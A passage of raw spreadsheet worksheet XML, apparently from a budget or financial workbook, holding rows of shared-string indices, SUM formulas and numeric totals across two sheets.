      <c r="B1577" s="34"/>
      <c r="C1577" s="34"/>
      <c r="D1577" s="10" t="s">
        <v>6276</v>
      </c>
      <c r="E1577" s="16" t="s">
        <v>4203</v>
      </c>
      <c r="F1577" s="33">
        <v>0</v>
      </c>
    </row>
    <row r="1578" spans="1:6">
      <c r="A1578" s="34"/>
      <c r="B1578" s="34"/>
      <c r="C1578" s="34"/>
      <c r="D1578" s="10" t="s">
        <v>6277</v>
      </c>
      <c r="E1578" s="11" t="s">
        <v>4204</v>
      </c>
      <c r="F1578" s="12">
        <f>SUM(F1579,F1592)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1579" spans="1:6">
      <c r="A1579" s="34"/>
      <c r="B1579" s="34"/>
      <c r="C1579" s="34"/>
      <c r="D1579" s="10" t="s">
        <v>6278</v>
      </c>
      <c r="E1579" s="11" t="s">
        <v>4205</v>
      </c>
      <c r="F1579" s="15">
        <f>SUM(F1580:F1591)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1580" spans="1:6">
      <c r="A1580" s="34"/>
      <c r="B1580" s="34"/>
      <c r="C1580" s="34"/>
      <c r="D1580" s="10" t="s">
        <v>6279</v>
      </c>
      <c r="E1580" s="16" t="s">
        <v>4206</v>
      </c>
      <c r="F1580" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1581" spans="1:6">
      <c r="A1581" s="34"/>
      <c r="B1581" s="34"/>
      <c r="C1581" s="34"/>
      <c r="D1581" s="10" t="s">
        <v>6280</v>
      </c>
      <c r="E1581" s="16" t="s">
        <v>4207</v>
      </c>
      <c r="F1581" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1582" spans="1:6">
      <c r="A1582" s="34"/>
      <c r="B1582" s="34"/>
      <c r="C1582" s="34"/>
      <c r="D1582" s="10" t="s">
        <v>6281</v>
      </c>
      <c r="E1582" s="16" t="s">
        <v>4208</v>
      </c>
      <c r="F1582" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1583" spans="1:6">
      <c r="A1583" s="34"/>
      <c r="B1583" s="34"/>
      <c r="C1583" s="34"/>
      <c r="D1583" s="10" t="s">
        <v>6282</v>
      </c>
      <c r="E1583" s="16" t="s">
        <v>4209</v>
      </c>
      <c r="F1583" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1584" spans="1:6">
      <c r="A1584" s="34"/>
      <c r="B1584" s="34"/>
      <c r="C1584" s="34"/>
      <c r="D1584" s="10" t="s">
        <v>6283</v>
      </c>
      <c r="E1584" s="16" t="s">
        <v>4210</v>
      </c>
      <c r="F1584" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1585" spans="1:6">
      <c r="A1585" s="34"/>
      <c r="B1585" s="34"/>
      <c r="C1585" s="34"/>
      <c r="D1585" s="10" t="s">
        <v>6284</v>
      </c>
      <c r="E1585" s="16" t="s">
        <v>4211</v>
      </c>
      <c r="F1585" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1586" spans="1:6">
      <c r="A1586" s="34"/>
      <c r="B1586" s="34"/>
      <c r="C1586" s="34"/>
      <c r="D1586" s="10" t="s">
        <v>6285</v>
      </c>
      <c r="E1586" s="16" t="s">
        <v>4212</v>
      </c>
      <c r="F1586" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1587" spans="1:6">
      <c r="A1587" s="34"/>
      <c r="B1587" s="34"/>
      <c r="C1587" s="34"/>
      <c r="D1587" s="10" t="s">
        <v>6286</v>
      </c>
      <c r="E1587" s="16" t="s">
        <v>4213</v>
      </c>
      <c r="F1587" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1588" spans="1:6">
      <c r="A1588" s="34"/>
      <c r="B1588" s="34"/>
      <c r="C1588" s="34"/>
      <c r="D1588" s="10" t="s">
        <v>6287</v>
      </c>
      <c r="E1588" s="16" t="s">
        <v>4214</v>
      </c>
      <c r="F1588" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1589" spans="1:6">
      <c r="A1589" s="34"/>
      <c r="B1589" s="34"/>
      <c r="C1589" s="34"/>
      <c r="D1589" s="10" t="s">
        <v>6288</v>
      </c>
      <c r="E1589" s="16" t="s">
        <v>4215</v>
      </c>
      <c r="F1589" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1590" spans="1:6">
      <c r="A1590" s="34"/>
      <c r="B1590" s="34"/>
      <c r="C1590" s="34"/>
      <c r="D1590" s="10" t="s">
        <v>6289</v>
      </c>
      <c r="E1590" s="16" t="s">
        <v>4216</v>
      </c>
      <c r="F1590" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1591" spans="1:6">
      <c r="A1591" s="34"/>
      <c r="B1591" s="34"/>
      <c r="C1591" s="34"/>
      <c r="D1591" s="10" t="s">
        <v>6290</v>
      </c>
      <c r="E1591" s="16" t="s">
        <v>4217</v>
      </c>
      <c r="F1591" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1592" spans="1:6">
      <c r="A1592" s="34"/>
      <c r="B1592" s="34"/>
      <c r="C1592" s="34"/>
      <c r="D1592" s="10" t="s">
        <v>6291</v>
      </c>
      <c r="E1592" s="11" t="s">
        <v>4218</v>
      </c>
      <c r="F1592" s="12">
        <f>SUM(F1593:F1598)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1593" spans="1:6">
      <c r="A1593" s="34"/>
      <c r="B1593" s="34"/>
      <c r="C1593" s="34"/>
      <c r="D1593" s="10" t="s">
        <v>6292</v>
      </c>
      <c r="E1593" s="16" t="s">
        <v>4219</v>
      </c>
      <c r="F1593" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1594" spans="1:6">
      <c r="A1594" s="34"/>
      <c r="B1594" s="34"/>
      <c r="C1594" s="34"/>
      <c r="D1594" s="10" t="s">
        <v>6293</v>
      </c>
      <c r="E1594" s="16" t="s">
        <v>4220</v>
      </c>
      <c r="F1594" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1595" spans="1:6">
      <c r="A1595" s="34"/>
      <c r="B1595" s="34"/>
      <c r="C1595" s="34"/>
      <c r="D1595" s="10" t="s">
        <v>6294</v>
      </c>
      <c r="E1595" s="16" t="s">
        <v>4221</v>
      </c>
      <c r="F1595" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1596" spans="1:6">
      <c r="A1596" s="34"/>
      <c r="B1596" s="34"/>
      <c r="C1596" s="34"/>
      <c r="D1596" s="10" t="s">
        <v>6295</v>
      </c>
      <c r="E1596" s="16" t="s">
        <v>4222</v>
      </c>
      <c r="F1596" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1597" spans="1:6">
      <c r="A1597" s="34"/>
      <c r="B1597" s="34"/>
      <c r="C1597" s="34"/>
      <c r="D1597" s="10" t="s">
        <v>6296</v>
      </c>
      <c r="E1597" s="16" t="s">
        <v>4223</v>
      </c>
      <c r="F1597" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1598" spans="1:6">
      <c r="A1598" s="34"/>
      <c r="B1598" s="34"/>
      <c r="C1598" s="34"/>
      <c r="D1598" s="10" t="s">
        <v>6297</v>
      </c>
      <c r="E1598" s="16" t="s">
        <v>4224</v>
      </c>
      <c r="F1598" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1599" spans="1:6">
      <c r="A1599" s="34"/>
      <c r="B1599" s="34"/>
      <c r="C1599" s="34"/>
      <c r="D1599" s="7"/>
      <c r="E1599" s="35"/>
      <c r="F1599" s="36"/>
    </row>
    <row r="1600" spans="1:6">
      <c r="A1600" s="34"/>
      <c r="B1600" s="34"/>
      <c r="C1600" s="34"/>
      <c r="D1600" s="10"/>
      <c r="E1600" s="11" t="s">
        <v>4225</v>
      </c>
      <c r="F1600" s="12">
        <f>F1601+F1604</f>
        <v>82</v>
      </c>
    </row>
    <row r="1601" spans="1:6">
      <c r="A1601" s="34"/>
      <c r="B1601" s="34"/>
      <c r="C1601" s="34"/>
      <c r="D1601" s="10" t="s">
        <v>5262</v>
      </c>
      <c r="E1601" s="11" t="s">
        <v>3376</v>
      </c>
      <c r="F1601" s="12">
        <f>F1602</f>
        <v>0</v>
      </c>
    </row>
    <row r="1602" spans="1:6">
      <c r="A1602" s="34"/>
      <c r="B1602" s="34"/>
      <c r="C1602" s="34"/>
      <c r="D1602" s="10" t="s">
        <v>5290</v>
      </c>
      <c r="E1602" s="11" t="s">
        <v>3396</v>
      </c>
      <c r="F1602" s="12">
        <f>F1603</f>
        <v>0</v>
      </c>
    </row>
    <row r="1603" spans="1:6">
      <c r="A1603" s="34"/>
      <c r="B1603" s="34"/>
      <c r="C1603" s="34"/>
      <c r="D1603" s="10" t="s">
        <v>6298</v>
      </c>
      <c r="E1603" s="16" t="s">
        <v>4226</v>
      </c>
      <c r="F1603" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1604" spans="1:6">
      <c r="A1604" s="34"/>
      <c r="B1604" s="34"/>
      <c r="C1604" s="34"/>
      <c r="D1604" s="10" t="s">
        <v>6299</v>
      </c>
      <c r="E1604" s="11" t="s">
        <v>4227</v>
      </c>
      <c r="F1604" s="12">
        <f>F1605+F1616+F1626+F1628</f>
        <v>82</v>
      </c>
    </row>
    <row r="1605" spans="1:6">
      <c r="A1605" s="34"/>
      <c r="B1605" s="34"/>
      <c r="C1605" s="34"/>
      <c r="D1605" s="10" t="s">
        <v>6300</v>
      </c>
      <c r="E1605" s="11" t="s">
        <v>4228</v>
      </c>
      <c r="F1605" s="12">
        <f>SUM(F1606:F1615)</f>
        <v>82</v>
      </c>
    </row>
    <row r="1606" spans="1:6">
      <c r="A1606" s="34"/>
      <c r="B1606" s="34"/>
      <c r="C1606" s="34"/>
      <c r="D1606" s="10" t="s">
        <v>6301</v>
      </c>
      <c r="E1606" s="16" t="s">
        <v>4229</v>
      </c>
      <c r="F1606" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1607" spans="1:6">
      <c r="A1607" s="34"/>
      <c r="B1607" s="34"/>
      <c r="C1607" s="34"/>
      <c r="D1607" s="10" t="s">
        <v>6302</v>
      </c>
      <c r="E1607" s="16" t="s">
        <v>4230</v>
      </c>
      <c r="F1607" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1608" spans="1:6">
      <c r="A1608" s="34"/>
      <c r="B1608" s="34"/>
      <c r="C1608" s="34"/>
      <c r="D1608" s="10" t="s">
        <v>6303</v>
      </c>
      <c r="E1608" s="16" t="s">
        <v>4231</v>
      </c>
      <c r="F1608" s="17">
        <v>40</v>
      </c>
    </row>
    <row r="1609" spans="1:6">
      <c r="A1609" s="34"/>
      <c r="B1609" s="34"/>
      <c r="C1609" s="34"/>
      <c r="D1609" s="10" t="s">
        <v>6304</v>
      </c>
      <c r="E1609" s="16" t="s">
        <v>4232</v>
      </c>
      <c r="F1609" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1610" spans="1:6">
      <c r="A1610" s="34"/>
      <c r="B1610" s="34"/>
      <c r="C1610" s="34"/>
      <c r="D1610" s="10" t="s">
        <v>6305</v>
      </c>
      <c r="E1610" s="16" t="s">
        <v>4233</v>
      </c>
      <c r="F1610" s="17">
        <v>21</v>
      </c>
    </row>
    <row r="1611" spans="1:6">
      <c r="A1611" s="34"/>
      <c r="B1611" s="34"/>
      <c r="C1611" s="34"/>
      <c r="D1611" s="10" t="s">
        <v>6306</v>
      </c>
      <c r="E1611" s="16" t="s">
        <v>4234</v>
      </c>
      <c r="F1611" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1612" spans="1:6">
      <c r="A1612" s="34"/>
      <c r="B1612" s="34"/>
      <c r="C1612" s="34"/>
      <c r="D1612" s="10" t="s">
        <v>6307</v>
      </c>
      <c r="E1612" s="16" t="s">
        <v>4235</v>
      </c>
      <c r="F1612" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1613" spans="1:6">
      <c r="A1613" s="34"/>
      <c r="B1613" s="34"/>
      <c r="C1613" s="34"/>
      <c r="D1613" s="10" t="s">
        <v>6308</v>
      </c>
      <c r="E1613" s="16" t="s">
        <v>4236</v>
      </c>
      <c r="F1613" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1614" spans="1:6">
      <c r="A1614" s="34"/>
      <c r="B1614" s="34"/>
      <c r="C1614" s="34"/>
      <c r="D1614" s="10" t="s">
        <v>6309</v>
      </c>
      <c r="E1614" s="16" t="s">
        <v>4237</v>
      </c>
      <c r="F1614" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1615" spans="1:6">
      <c r="A1615" s="34"/>
      <c r="B1615" s="34"/>
      <c r="C1615" s="34"/>
      <c r="D1615" s="10" t="s">
        <v>6310</v>
      </c>
      <c r="E1615" s="16" t="s">
        <v>4238</v>
      </c>
      <c r="F1615" s="17">
        <v>21</v>
      </c>
    </row>
    <row r="1616" spans="1:6">
      <c r="A1616" s="34"/>
      <c r="B1616" s="34"/>
      <c r="C1616" s="34"/>
      <c r="D1616" s="10" t="s">
        <v>6311</v>
      </c>
      <c r="E1616" s="11" t="s">
        <v>4239</v>
      </c>
      <c r="F1616" s="12">
        <f>SUM(F1617:F1625)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1617" spans="1:6">
      <c r="A1617" s="34"/>
      <c r="B1617" s="34"/>
      <c r="C1617" s="34"/>
      <c r="D1617" s="10" t="s">
        <v>6312</v>
      </c>
      <c r="E1617" s="16" t="s">
        <v>4240</v>
      </c>
      <c r="F1617" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1618" spans="1:6">
      <c r="A1618" s="34"/>
      <c r="B1618" s="34"/>
      <c r="C1618" s="34"/>
      <c r="D1618" s="10" t="s">
        <v>6313</v>
      </c>
      <c r="E1618" s="16" t="s">
        <v>4241</v>
      </c>
      <c r="F1618" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1619" spans="1:6">
      <c r="A1619" s="34"/>
      <c r="B1619" s="34"/>
      <c r="C1619" s="34"/>
      <c r="D1619" s="10" t="s">
        <v>6314</v>
      </c>
      <c r="E1619" s="16" t="s">
        <v>4242</v>
      </c>
      <c r="F1619" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1620" spans="1:6">
      <c r="A1620" s="34"/>
      <c r="B1620" s="34"/>
      <c r="C1620" s="34"/>
      <c r="D1620" s="10" t="s">
        <v>6315</v>
      </c>
      <c r="E1620" s="16" t="s">
        <v>4243</v>
      </c>
      <c r="F1620" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1621" spans="1:6">
      <c r="A1621" s="34"/>
      <c r="B1621" s="34"/>
      <c r="C1621" s="34"/>
      <c r="D1621" s="10" t="s">
        <v>6316</v>
      </c>
      <c r="E1621" s="16" t="s">
        <v>4244</v>
      </c>
      <c r="F1621" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1622" spans="1:6">
      <c r="A1622" s="34"/>
      <c r="B1622" s="34"/>
      <c r="C1622" s="34"/>
      <c r="D1622" s="10" t="s">
        <v>6317</v>
      </c>
      <c r="E1622" s="16" t="s">
        <v>4245</v>
      </c>
      <c r="F1622" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1623" spans="1:6">
      <c r="A1623" s="34"/>
      <c r="B1623" s="34"/>
      <c r="C1623" s="34"/>
      <c r="D1623" s="10" t="s">
        <v>6318</v>
      </c>
      <c r="E1623" s="16" t="s">
        <v>4246</v>
      </c>
      <c r="F1623" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1624" spans="1:6">
      <c r="A1624" s="34"/>
      <c r="B1624" s="34"/>
      <c r="C1624" s="34"/>
      <c r="D1624" s="10" t="s">
        <v>6319</v>
      </c>
      <c r="E1624" s="16" t="s">
        <v>4247</v>
      </c>
      <c r="F1624" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1625" spans="1:6">
      <c r="A1625" s="34"/>
      <c r="B1625" s="34"/>
      <c r="C1625" s="34"/>
      <c r="D1625" s="10" t="s">
        <v>6320</v>
      </c>
      <c r="E1625" s="16" t="s">
        <v>4248</v>
      </c>
      <c r="F1625" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1626" spans="1:6">
      <c r="A1626" s="34"/>
      <c r="B1626" s="34"/>
      <c r="C1626" s="34"/>
      <c r="D1626" s="10" t="s">
        <v>6321</v>
      </c>
      <c r="E1626" s="11" t="s">
        <v>4249</v>
      </c>
      <c r="F1626" s="12">
        <f>F1627</f>
        <v>0</v>
      </c>
    </row>
    <row r="1627" spans="1:6">
      <c r="A1627" s="34"/>
      <c r="B1627" s="34"/>
      <c r="C1627" s="34"/>
      <c r="D1627" s="10" t="s">
        <v>6322</v>
      </c>
      <c r="E1627" s="16" t="s">
        <v>4250</v>
      </c>
      <c r="F1627" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1628" spans="1:6">
      <c r="A1628" s="34"/>
      <c r="B1628" s="34"/>
      <c r="C1628" s="34"/>
      <c r="D1628" s="10" t="s">
        <v>6323</v>
      </c>
      <c r="E1628" s="11" t="s">
        <v>4251</v>
      </c>
      <c r="F1628" s="12">
        <f>F1629</f>
        <v>0</v>
      </c>
    </row>
    <row r="1629" spans="1:6">
      <c r="A1629" s="34"/>
      <c r="B1629" s="34"/>
      <c r="C1629" s="34"/>
      <c r="D1629" s="10" t="s">
        <v>6324</v>
      </c>
      <c r="E1629" s="16" t="s">
        <v>4252</v>
      </c>
      <c r="F1629" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1630" spans="1:6">
      <c r="A1630" s="34"/>
      <c r="B1630" s="34"/>
      <c r="C1630" s="34"/>
      <c r="D1630" s="7"/>
      <c r="E1630" s="35"/>
      <c r="F1630" s="38"/>
    </row>
    <row r="1631" spans="1:6">
      <c r="A1631" s="34"/>
      <c r="B1631" s="34"/>
      <c r="C1631" s="34"/>
      <c r="D1631" s="10" t="s">
        <v>6325</v>
      </c>
      <c r="E1631" s="11" t="s">
        <v>4253</v>
      </c>
      <c r="F1631" s="12">
        <f>SUM(F1632:F1634,F1639,F1656)</f>
        <v>56067</v>
      </c>
    </row>
    <row r="1632" spans="1:6">
      <c r="A1632" s="34"/>
      <c r="B1632" s="34"/>
      <c r="C1632" s="34"/>
      <c r="D1632" s="10" t="s">
        <v>6326</v>
      </c>
      <c r="E1632" s="39" t="s">
        <v>4254</v>
      </c>
      <c r="F1632" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1633" spans="1:6">
      <c r="A1633" s="34"/>
      <c r="B1633" s="34"/>
      <c r="C1633" s="34"/>
      <c r="D1633" s="10" t="s">
        <v>6327</v>
      </c>
      <c r="E1633" s="39" t="s">
        <v>4255</v>
      </c>
      <c r="F1633" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1634" spans="1:6">
      <c r="A1634" s="34"/>
      <c r="B1634" s="34"/>
      <c r="C1634" s="34"/>
      <c r="D1634" s="10" t="s">
        <v>6328</v>
      </c>
      <c r="E1634" s="39" t="s">
        <v>4256</v>
      </c>
      <c r="F1634" s="12">
        <f>SUM(F1635:F1638)</f>
        <v>31037</v>
      </c>
    </row>
    <row r="1635" spans="1:6">
      <c r="A1635" s="34"/>
      <c r="B1635" s="34"/>
      <c r="C1635" s="34"/>
      <c r="D1635" s="10" t="s">
        <v>6329</v>
      </c>
      <c r="E1635" s="40" t="s">
        <v>4257</v>
      </c>
      <c r="F1635" s="17">
        <v>31037</v>
      </c>
    </row>
    <row r="1636" spans="1:6">
      <c r="A1636" s="34"/>
      <c r="B1636" s="34"/>
      <c r="C1636" s="34"/>
      <c r="D1636" s="10" t="s">
        <v>6330</v>
      </c>
      <c r="E1636" s="40" t="s">
        <v>4258</v>
      </c>
      <c r="F1636" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1637" spans="1:6">
      <c r="A1637" s="34"/>
      <c r="B1637" s="34"/>
      <c r="C1637" s="34"/>
      <c r="D1637" s="10" t="s">
        <v>6331</v>
      </c>
      <c r="E1637" s="40" t="s">
        <v>4259</v>
      </c>
      <c r="F1637" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1638" spans="1:6">
      <c r="A1638" s="34"/>
      <c r="B1638" s="34"/>
      <c r="C1638" s="34"/>
      <c r="D1638" s="10" t="s">
        <v>6332</v>
      </c>
      <c r="E1638" s="40" t="s">
        <v>4260</v>
      </c>
      <c r="F1638" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1639" spans="1:6">
      <c r="A1639" s="34"/>
      <c r="B1639" s="34"/>
      <c r="C1639" s="34"/>
      <c r="D1639" s="10" t="s">
        <v>6333</v>
      </c>
      <c r="E1639" s="39" t="s">
        <v>4261</v>
      </c>
      <c r="F1639" s="12">
        <f>SUM(F1640:F1655)</f>
        <v>25030</v>
      </c>
    </row>
    <row r="1640" spans="1:6">
      <c r="A1640" s="34"/>
      <c r="B1640" s="34"/>
      <c r="C1640" s="34"/>
      <c r="D1640" s="10" t="s">
        <v>6334</v>
      </c>
      <c r="E1640" s="40" t="s">
        <v>4262</v>
      </c>
      <c r="F1640" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1641" spans="1:6">
      <c r="A1641" s="34"/>
      <c r="B1641" s="34"/>
      <c r="C1641" s="34"/>
      <c r="D1641" s="10" t="s">
        <v>6335</v>
      </c>
      <c r="E1641" s="40" t="s">
        <v>4263</v>
      </c>
      <c r="F1641" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1642" spans="1:6">
      <c r="A1642" s="34"/>
      <c r="B1642" s="34"/>
      <c r="C1642" s="34"/>
      <c r="D1642" s="10" t="s">
        <v>6336</v>
      </c>
      <c r="E1642" s="40" t="s">
        <v>4264</v>
      </c>
      <c r="F1642" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1643" spans="1:6">
      <c r="A1643" s="34"/>
      <c r="B1643" s="34"/>
      <c r="C1643" s="34"/>
      <c r="D1643" s="10" t="s">
        <v>6337</v>
      </c>
      <c r="E1643" s="40" t="s">
        <v>4265</v>
      </c>
      <c r="F1643" s="17">
        <v>21930</v>
      </c>
    </row>
    <row r="1644" spans="1:6">
      <c r="A1644" s="34"/>
      <c r="B1644" s="34"/>
      <c r="C1644" s="34"/>
      <c r="D1644" s="10" t="s">
        <v>6338</v>
      </c>
      <c r="E1644" s="40" t="s">
        <v>4266</v>
      </c>
      <c r="F1644" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1645" spans="1:6">
      <c r="A1645" s="34"/>
      <c r="B1645" s="34"/>
      <c r="C1645" s="34"/>
      <c r="D1645" s="10" t="s">
        <v>6339</v>
      </c>
      <c r="E1645" s="40" t="s">
        <v>4267</v>
      </c>
      <c r="F1645" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1646" spans="1:6">
      <c r="A1646" s="34"/>
      <c r="B1646" s="34"/>
      <c r="C1646" s="34"/>
      <c r="D1646" s="10" t="s">
        <v>6340</v>
      </c>
      <c r="E1646" s="40" t="s">
        <v>4268</v>
      </c>
      <c r="F1646" s="33">
        <v>0</v>
      </c>
    </row>
    <row r="1647" spans="1:6">
      <c r="A1647" s="34"/>
      <c r="B1647" s="34"/>
      <c r="C1647" s="34"/>
      <c r="D1647" s="41" t="s">
        <v>6341</v>
      </c>
      <c r="E1647" s="42" t="s">
        <v>4269</v>
      </c>
      <c r="F1647" s="33">
        <v>0</v>
      </c>
    </row>
    <row r="1648" spans="1:6">
      <c r="A1648" s="34"/>
      <c r="B1648" s="34"/>
      <c r="C1648" s="34"/>
      <c r="D1648" s="10" t="s">
        <v>6342</v>
      </c>
      <c r="E1648" s="40" t="s">
        <v>4270</v>
      </c>
      <c r="F1648" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1649" spans="1:6">
      <c r="A1649" s="34"/>
      <c r="B1649" s="34"/>
      <c r="C1649" s="34"/>
      <c r="D1649" s="10" t="s">
        <v>6343</v>
      </c>
      <c r="E1649" s="40" t="s">
        <v>4271</v>
      </c>
      <c r="F1649" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="1650" spans="1:6">
      <c r="A1650" s="34"/>
      <c r="B1650" s="34"/>
      <c r="C1650" s="34"/>
      <c r="D1650" s="41" t="s">
        <v>6344</v>
      </c>
      <c r="E1650" s="42" t="s">
        <v>4272</v>
      </c>
      <c r="F1650" s="33">
        <v>0</v>
      </c>
    </row>
    <row r="1651" spans="1:6">
      <c r="A1651" s="43"/>
      <c r="B1651" s="43"/>
      <c r="C1651" s="43"/>
      <c r="D1651" s="10" t="s">
        <v>6345</v>
      </c>
      <c r="E1651" s="40" t="s">
        <v>4273</v>
      </c>
      <c r="F1651" s="17">
        <v>3100</v>
      </c>
    </row>
    <row r="1652" spans="1:6">
      <c r="A1652" s="44"/>
      <c r="B1652" s="43"/>
      <c r="C1652" s="43"/>
      <c r="D1652" s="10" t="s">
        <v>6346</v>
      </c>
      <c r="E1652" s="40" t="s">
        <v>4274</v>
      </c>
      <c r="F1652" s="17"/>
    </row>
    <row r="1653" spans="1:6">
      <c r="A1653" s="45"/>
      <c r="B1653" s="45"/>
      <c r="C1653" s="45"/>
      <c r="D1653" s="13" t="s">
        <v>6347</v>
      </c>
      <c r="E1653" s="40" t="s">
        <v>4275</v>
      </c>
      <c r="F1653" s="17"/>
    </row>
    <row r="1654" spans="1:6">
      <c r="A1654" s="45"/>
      <c r="B1654" s="45"/>
      <c r="C1654" s="45"/>
      <c r="D1654" s="13" t="s">
        <v>6348</v>
      </c>
      <c r="E1654" s="40" t="s">
        <v>4276</v>
      </c>
      <c r="F1654" s="33"/>
    </row>
    <row r="1655" spans="1:6">
      <c r="A1655" s="45"/>
      <c r="B1655" s="45"/>
      <c r="C1655" s="45"/>
      <c r="D1655" s="13" t="s">
        <v>6349</v>
      </c>
      <c r="E1655" s="40" t="s">
        <v>4277</v>
      </c>
      <c r="F1655" s="17"/>
    </row>
    <row r="1656" spans="1:6">
      <c r="A1656" s="45"/>
      <c r="B1656" s="45"/>
      <c r="C1656" s="45"/>
      <c r="D1656" s="13" t="s">
        <v>6350</v>
      </c>
      <c r="E1656" s="39" t="s">
        <v>4278</v>
      </c>
      <c r="F1656" s="20"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="A468:C468"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75"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9" tint="0.599993896298105"/>
  </sheetPr>
  <dimension ref="A1:B22"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E23" sqref="E23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="1"/>
  <cols>
    <col min="1" max="1" width="50" style="63" customWidth="1"/>
    <col min="2" max="2" width="25.8425925925926" style="65" customWidth="1"/>
    <col min="3" max="16384" width="10.2777777777778" style="63"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:2">
      <c r="A1" s="1142" t="s">
        <v>490</v>
      </c>
      <c r="B1" s="85"/>
    </row>
    <row r="2" ht="32.1" customHeight="1" spans="1:2">
      <c r="A2" s="150" t="s">
        <v>491</v>
      </c>
      <c r="B2" s="150"/>
    </row>
    <row r="3" ht="18" customHeight="1" spans="1:2">
      <c r="A3" s="1132" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="1132"/>
    </row>
    <row r="4" ht="33" customHeight="1" spans="1:2">
      <c r="A4" s="972" t="s">
        <v>457</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="5" ht="26.1" customHeight="1" spans="1:2">
      <c r="A5" s="1134" t="s">
        <v>492</v>
      </c>
      <c r="B5" s="1141">
        <v>167</v>
      </c>
    </row>
    <row r="6" ht="26.1" customHeight="1" spans="1:2">
      <c r="A6" s="1134" t="s">
        <v>493</v>
      </c>
      <c r="B6" s="1141">
        <v>4</v>
      </c>
    </row>
    <row r="7" ht="26.1" customHeight="1" spans="1:2">
      <c r="A7" s="1134" t="s">
        <v>494</v>
      </c>
      <c r="B7" s="1141">
        <v>36</v>
      </c>
    </row>
    <row r="8" ht="26.1" customHeight="1" spans="1:2">
      <c r="A8" s="1134" t="s">
        <v>495</v>
      </c>
      <c r="B8" s="1141">
        <v>502</v>
      </c>
    </row>
    <row r="9" ht="26.1" customHeight="1" spans="1:2">
      <c r="A9" s="1134" t="s">
        <v>496</v>
      </c>
      <c r="B9" s="1141">
        <v>100</v>
      </c>
    </row>
    <row r="10" ht="26.1" customHeight="1" spans="1:2">
      <c r="A10" s="1134" t="s">
        <v>497</v>
      </c>
      <c r="B10" s="1141">
        <v>36</v>
      </c>
    </row>
    <row r="11" ht="26.1" customHeight="1" spans="1:2">
      <c r="A11" s="1134" t="s">
        <v>498</v>
      </c>
      <c r="B11" s="1141">
        <v>122</v>
      </c>
    </row>
    <row r="12" ht="26.1" customHeight="1" spans="1:2">
      <c r="A12" s="1134" t="s">
        <v>499</v>
      </c>
      <c r="B12" s="1141">
        <v>190</v>
      </c>
    </row>
    <row r="13" ht="26.1" customHeight="1" spans="1:2">
      <c r="A13" s="1134" t="s">
        <v>500</v>
      </c>
      <c r="B13" s="1141">
        <v>1750</v>
      </c>
    </row>
    <row r="14" ht="26.1" customHeight="1" spans="1:2">
      <c r="A14" s="1134" t="s">
        <v>501</v>
      </c>
      <c r="B14" s="1141">
        <v>3000</v>
      </c>
    </row>
    <row r="15" ht="26.1" customHeight="1" spans="1:2">
      <c r="A15" s="1134" t="s">
        <v>502</v>
      </c>
      <c r="B15" s="1141">
        <v>4226</v>
      </c>
    </row>
    <row r="16" ht="26.1" customHeight="1" spans="1:2">
      <c r="A16" s="1134" t="s">
        <v>503</v>
      </c>
      <c r="B16" s="1141">
        <v>6650</v>
      </c>
    </row>
    <row r="17" ht="26.1" customHeight="1" spans="1:2">
      <c r="A17" s="1134" t="s">
        <v>504</v>
      </c>
